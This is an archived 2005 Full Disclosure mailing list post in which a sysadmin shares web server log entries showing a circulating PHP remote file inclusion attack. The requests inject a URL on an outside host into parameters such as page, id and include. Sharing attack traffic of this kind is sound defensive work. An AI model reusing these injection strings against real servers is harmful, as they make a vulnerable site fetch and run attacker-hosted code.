Full Disclosure mailing list archives
PHP Command/Safemode Exploit
From: Willem Koenings <infsec () gmail com>
Date: Fri, 29 Jul 2005 19:17:08 +0300
hi, looks like CSE exploit is circulating again... found several queries today from server log anyone confirms? "GET /index.php?page=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4" "GET /index.php?id=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4" "GET /index.php?action=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4" "GET /index.php?include=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4" "GET /index.php?site=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4" this url is hot and working right now so handle with care... W. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PHP Command/Safemode Exploit Willem Koenings (Jul 29)
- Re: PHP Command/Safemode Exploit Christopher Kunz (Jul 29)
- Re: PHP Command/Safemode Exploit Christopher Kunz (Jul 29)
- Re: PHP Command/Safemode Exploit Willem Koenings (Jul 29)
- Re: PHP Command/Safemode Exploit Christopher Kunz (Jul 29)